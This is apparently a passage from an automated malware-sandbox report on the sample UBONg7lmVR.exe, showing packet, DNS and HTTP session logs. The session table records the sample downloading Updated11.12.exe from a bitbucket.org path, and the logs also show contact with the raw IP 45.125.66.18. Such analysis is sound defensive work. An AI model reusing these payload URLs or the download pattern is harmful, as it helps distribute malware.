                                                Aug 27, 2024 12:55:19.889060974 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.889111996 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.889136076 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.889170885 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.889177084 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.889204025 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.889219046 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.889226913 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.889246941 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.889281034 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.889287949 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.889319897 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.889327049 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.889415979 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.889431000 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.889477968 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.889484882 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.889528990 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.897283077 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.897300005 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.897377014 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.897384882 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.897430897 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.974705935 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.974728107 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.974852085 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.974863052 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.974910021 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.975572109 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.975589037 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.975646019 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.975652933 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.975697994 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.977467060 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.977483988 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.977540970 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.977549076 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.977607012 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.978177071 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.978193045 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.978257895 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.978265047 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.978308916 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.978861094 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.978888988 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.978939056 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.978945971 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.978970051 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.978981018 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.979357958 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.979372978 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.979429960 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.979438066 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.979475975 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.980223894 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.980273008 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.980290890 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.980297089 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.980310917 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.980329037 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.980354071 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.981198072 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:20.470432997 CEST49711443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:20.470474958 CEST44349711185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:20.470556021 CEST49711443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:20.471724033 CEST49711443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:20.471738100 CEST44349711185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:20.935085058 CEST44349711185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:20.941929102 CEST49711443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:20.941952944 CEST44349711185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:20.942125082 CEST49711443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:20.942130089 CEST44349711185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:20.943190098 CEST44349711185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:20.943269968 CEST49711443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.001454115 CEST49711443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.001560926 CEST44349711185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:21.002017021 CEST49711443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.002026081 CEST44349711185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:21.049489975 CEST49711443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.100133896 CEST44349711185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:21.100250006 CEST44349711185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:21.100308895 CEST49711443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.100657940 CEST49711443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.100676060 CEST44349711185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:21.100707054 CEST49711443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.100713968 CEST44349711185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:21.102349043 CEST49712443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.102389097 CEST44349712185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:21.102500916 CEST49712443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.102835894 CEST49712443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.102845907 CEST44349712185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:21.559967041 CEST44349712185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:21.560338020 CEST49712443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.560354948 CEST44349712185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:21.560571909 CEST49712443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.560576916 CEST44349712185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:21.561626911 CEST44349712185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:21.561726093 CEST49712443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.562714100 CEST49712443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.562800884 CEST49712443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.562805891 CEST44349712185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:21.608506918 CEST44349712185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:21.610342026 CEST49712443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.610357046 CEST44349712185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:21.658714056 CEST49712443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.674297094 CEST44349712185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:21.674402952 CEST44349712185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:21.674494028 CEST49712443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.734956026 CEST49712443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.734992027 CEST44349712185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:21.735084057 CEST49712443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:21.735090971 CEST44349712185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:50.880312920 CEST49721443192.168.2.5140.82.121.3
                                                Aug 27, 2024 12:55:50.880363941 CEST44349721140.82.121.3192.168.2.5
                                                Aug 27, 2024 12:55:50.880479097 CEST49721443192.168.2.5140.82.121.3
                                                Aug 27, 2024 12:55:50.880772114 CEST49721443192.168.2.5140.82.121.3
                                                Aug 27, 2024 12:55:50.880786896 CEST44349721140.82.121.3192.168.2.5
                                                Aug 27, 2024 12:55:51.512778997 CEST44349721140.82.121.3192.168.2.5
                                                Aug 27, 2024 12:55:51.513031006 CEST49721443192.168.2.5140.82.121.3
                                                Aug 27, 2024 12:55:51.513056993 CEST44349721140.82.121.3192.168.2.5
                                                Aug 27, 2024 12:55:51.513195992 CEST49721443192.168.2.5140.82.121.3
                                                Aug 27, 2024 12:55:51.513201952 CEST44349721140.82.121.3192.168.2.5
                                                Aug 27, 2024 12:55:51.514283895 CEST44349721140.82.121.3192.168.2.5
                                                Aug 27, 2024 12:55:51.514349937 CEST49721443192.168.2.5140.82.121.3
                                                Aug 27, 2024 12:55:51.525593996 CEST49721443192.168.2.5140.82.121.3
                                                Aug 27, 2024 12:55:51.525670052 CEST44349721140.82.121.3192.168.2.5
                                                Aug 27, 2024 12:55:51.525711060 CEST49721443192.168.2.5140.82.121.3
                                                Aug 27, 2024 12:55:51.572499990 CEST44349721140.82.121.3192.168.2.5
                                                Aug 27, 2024 12:55:51.573107004 CEST49721443192.168.2.5140.82.121.3
                                                Aug 27, 2024 12:55:51.573129892 CEST44349721140.82.121.3192.168.2.5
                                                Aug 27, 2024 12:55:51.620876074 CEST49721443192.168.2.5140.82.121.3
                                                Aug 27, 2024 12:55:51.777995110 CEST44349721140.82.121.3192.168.2.5
                                                Aug 27, 2024 12:55:51.778079033 CEST44349721140.82.121.3192.168.2.5
                                                Aug 27, 2024 12:55:51.778135061 CEST44349721140.82.121.3192.168.2.5
                                                Aug 27, 2024 12:55:51.778157949 CEST49721443192.168.2.5140.82.121.3
                                                Aug 27, 2024 12:55:51.778230906 CEST49721443192.168.2.5140.82.121.3
                                                Aug 27, 2024 12:55:51.778405905 CEST49721443192.168.2.5140.82.121.3
                                                Aug 27, 2024 12:55:51.778429985 CEST44349721140.82.121.3192.168.2.5
                                                Aug 27, 2024 12:55:51.778448105 CEST49721443192.168.2.5140.82.121.3
                                                Aug 27, 2024 12:55:51.778454065 CEST44349721140.82.121.3192.168.2.5
                                                Aug 27, 2024 12:55:51.779536963 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:51.779586077 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:51.779692888 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:51.779953003 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:51.779968977 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.254220963 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.254585981 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.254601002 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.254616976 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.254621029 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.255625010 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.255693913 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.256630898 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.256692886 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.256716967 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.304033995 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.304073095 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.352324009 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.357109070 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.357168913 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.357213020 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.357220888 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.357232094 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.357263088 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.357278109 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.357283115 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.357326984 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.357331038 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.357764959 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.357794046 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.357811928 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.357815981 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.357851028 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.357856035 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.357860088 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.357897043 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.371469975 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.419118881 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.447422981 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.447484016 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.447527885 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.447607040 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.447624922 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.447635889 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.447671890 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.447684050 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.447742939 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.447747946 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.448281050 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.448307037 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.448326111 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.448329926 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.448354959 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.448399067 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.448404074 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.448447943 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.449738026 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.449876070 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.449904919 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.449923992 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.449928045 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.449955940 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.449965954 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.449970007 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.450015068 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.450016022 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.450059891 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.450186014 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.450201988 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:52.450222969 CEST49722443192.168.2.5185.199.111.133
                                                Aug 27, 2024 12:55:52.450227976 CEST44349722185.199.111.133192.168.2.5
                                                Aug 27, 2024 12:55:54.838376045 CEST49723443192.168.2.545.125.66.18
                                                Aug 27, 2024 12:55:54.838407993 CEST4434972345.125.66.18192.168.2.5
                                                Aug 27, 2024 12:55:54.838486910 CEST49723443192.168.2.545.125.66.18
                                                Aug 27, 2024 12:55:54.842776060 CEST49723443192.168.2.545.125.66.18
                                                Aug 27, 2024 12:55:54.842794895 CEST4434972345.125.66.18192.168.2.5
                                                Aug 27, 2024 12:55:55.503041029 CEST4434972345.125.66.18192.168.2.5
                                                Aug 27, 2024 12:55:55.503226995 CEST49723443192.168.2.545.125.66.18
                                                Aug 27, 2024 12:55:55.611394882 CEST49723443192.168.2.545.125.66.18
                                                Aug 27, 2024 12:55:55.611421108 CEST4434972345.125.66.18192.168.2.5
                                                Aug 27, 2024 12:55:55.611722946 CEST4434972345.125.66.18192.168.2.5
                                                Aug 27, 2024 12:55:55.660232067 CEST49723443192.168.2.545.125.66.18
                                                Aug 27, 2024 12:55:55.941066980 CEST49723443192.168.2.545.125.66.18
                                                Aug 27, 2024 12:55:55.941112995 CEST49723443192.168.2.545.125.66.18
                                                Aug 27, 2024 12:55:55.941137075 CEST4434972345.125.66.18192.168.2.5
                                                Aug 27, 2024 12:55:56.437335014 CEST4434972345.125.66.18192.168.2.5
                                                Aug 27, 2024 12:55:56.437491894 CEST4434972345.125.66.18192.168.2.5
                                                Aug 27, 2024 12:55:56.437551022 CEST49723443192.168.2.545.125.66.18
                                                Aug 27, 2024 12:55:59.426219940 CEST49723443192.168.2.545.125.66.18
                                                Aug 27, 2024 12:55:59.445756912 CEST49724443192.168.2.534.194.69.213
                                                Aug 27, 2024 12:55:59.445791960 CEST4434972434.194.69.213192.168.2.5
                                                Aug 27, 2024 12:55:59.445894957 CEST49724443192.168.2.534.194.69.213
                                                Aug 27, 2024 12:55:59.446099043 CEST49724443192.168.2.534.194.69.213
                                                Aug 27, 2024 12:55:59.446111917 CEST4434972434.194.69.213192.168.2.5
                                                Aug 27, 2024 12:56:00.159506083 CEST4434972434.194.69.213192.168.2.5
                                                Aug 27, 2024 12:56:00.159864902 CEST49724443192.168.2.534.194.69.213
                                                Aug 27, 2024 12:56:00.159877062 CEST4434972434.194.69.213192.168.2.5
                                                Aug 27, 2024 12:56:00.160065889 CEST49724443192.168.2.534.194.69.213
                                                Aug 27, 2024 12:56:00.160070896 CEST4434972434.194.69.213192.168.2.5
                                                Aug 27, 2024 12:56:00.161576033 CEST4434972434.194.69.213192.168.2.5
                                                Aug 27, 2024 12:56:00.161644936 CEST49724443192.168.2.534.194.69.213
                                                Aug 27, 2024 12:56:00.163017035 CEST49724443192.168.2.534.194.69.213
                                                Aug 27, 2024 12:56:00.163094044 CEST4434972434.194.69.213192.168.2.5
                                                Aug 27, 2024 12:56:00.163111925 CEST49724443192.168.2.534.194.69.213
                                                Aug 27, 2024 12:56:00.204504967 CEST4434972434.194.69.213192.168.2.5
                                                Aug 27, 2024 12:56:00.210613966 CEST49724443192.168.2.534.194.69.213
                                                Aug 27, 2024 12:56:00.210618973 CEST4434972434.194.69.213192.168.2.5
                                                Aug 27, 2024 12:56:00.258301020 CEST49724443192.168.2.534.194.69.213
                                                Aug 27, 2024 12:56:00.860785007 CEST4434972434.194.69.213192.168.2.5
                                                Aug 27, 2024 12:56:00.860955954 CEST4434972434.194.69.213192.168.2.5
                                                Aug 27, 2024 12:56:00.861022949 CEST49724443192.168.2.534.194.69.213
                                                Aug 27, 2024 12:56:00.862552881 CEST49724443192.168.2.534.194.69.213
                                                Aug 27, 2024 12:56:00.862552881 CEST49724443192.168.2.534.194.69.213
                                                Aug 27, 2024 12:56:00.862570047 CEST4434972434.194.69.213192.168.2.5
                                                Aug 27, 2024 12:56:00.862579107 CEST4434972434.194.69.213192.168.2.5
                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 27, 2024 12:55:11.756688118 CEST6465053192.168.2.51.1.1.1
                                                Aug 27, 2024 12:55:12.258321047 CEST53646501.1.1.1192.168.2.5
                                                Aug 27, 2024 12:55:13.597923994 CEST5027753192.168.2.51.1.1.1
                                                Aug 27, 2024 12:55:13.624684095 CEST53502771.1.1.1192.168.2.5
                                                Aug 27, 2024 12:55:20.460791111 CEST5295253192.168.2.51.1.1.1
                                                Aug 27, 2024 12:55:20.468146086 CEST53529521.1.1.1192.168.2.5
                                                Aug 27, 2024 12:55:50.872682095 CEST6353553192.168.2.51.1.1.1
                                                Aug 27, 2024 12:55:50.879483938 CEST53635351.1.1.1192.168.2.5
                                                Aug 27, 2024 12:55:59.437446117 CEST6342653192.168.2.51.1.1.1
                                                Aug 27, 2024 12:55:59.444689989 CEST53634261.1.1.1192.168.2.5
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Aug 27, 2024 12:55:11.756688118 CEST192.168.2.51.1.1.10x7944Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:13.597923994 CEST192.168.2.51.1.1.10xd830Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:20.460791111 CEST192.168.2.51.1.1.10xb186Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:50.872682095 CEST192.168.2.51.1.1.10x910eStandard query (0)github.comA (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:59.437446117 CEST192.168.2.51.1.1.10x9fe2Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Aug 27, 2024 12:55:12.258321047 CEST1.1.1.1192.168.2.50x7944No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:12.258321047 CEST1.1.1.1192.168.2.50x7944No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:12.258321047 CEST1.1.1.1192.168.2.50x7944No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:13.624684095 CEST1.1.1.1192.168.2.50xd830No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                Aug 27, 2024 12:55:13.624684095 CEST1.1.1.1192.168.2.50xd830No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                Aug 27, 2024 12:55:13.624684095 CEST1.1.1.1192.168.2.50xd830No error (0)s3-w.us-east-1.amazonaws.com52.216.214.209A (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:13.624684095 CEST1.1.1.1192.168.2.50xd830No error (0)s3-w.us-east-1.amazonaws.com54.231.198.105A (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:13.624684095 CEST1.1.1.1192.168.2.50xd830No error (0)s3-w.us-east-1.amazonaws.com52.216.139.35A (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:13.624684095 CEST1.1.1.1192.168.2.50xd830No error (0)s3-w.us-east-1.amazonaws.com3.5.25.210A (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:13.624684095 CEST1.1.1.1192.168.2.50xd830No error (0)s3-w.us-east-1.amazonaws.com3.5.21.110A (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:13.624684095 CEST1.1.1.1192.168.2.50xd830No error (0)s3-w.us-east-1.amazonaws.com3.5.28.107A (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:13.624684095 CEST1.1.1.1192.168.2.50xd830No error (0)s3-w.us-east-1.amazonaws.com52.216.220.97A (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:13.624684095 CEST1.1.1.1192.168.2.50xd830No error (0)s3-w.us-east-1.amazonaws.com52.217.196.217A (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:20.468146086 CEST1.1.1.1192.168.2.50xb186No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:20.468146086 CEST1.1.1.1192.168.2.50xb186No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:20.468146086 CEST1.1.1.1192.168.2.50xb186No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:20.468146086 CEST1.1.1.1192.168.2.50xb186No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:50.879483938 CEST1.1.1.1192.168.2.50x910eNo error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:59.444689989 CEST1.1.1.1192.168.2.50x9fe2No error (0)httpbin.org34.194.69.213A (IP address)IN (0x0001)false
                                                Aug 27, 2024 12:55:59.444689989 CEST1.1.1.1192.168.2.50x9fe2No error (0)httpbin.org3.211.178.193A (IP address)IN (0x0001)false
                                                • bitbucket.org
                                                • bbuseruploads.s3.amazonaws.com
                                                • raw.githubusercontent.com
                                                • github.com
                                                • https:
                                                • 45.125.66.18
                                                • httpbin.org
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549704185.166.143.484432924C:\Users\user\Desktop\UBONg7lmVR.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-27 10:55:13 UTC109OUTGET /updated24/updated24/downloads/Updated11.12.exe HTTP/1.1
                                                Host: bitbucket.org
                                                Connection: Keep-Alive
                                                2024-08-27 10:55:13 UTC5011INHTTP/1.1 302 Found
                                                Date: Tue, 27 Aug 2024 10:55:13 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 0
                                                Server: AtlassianEdge
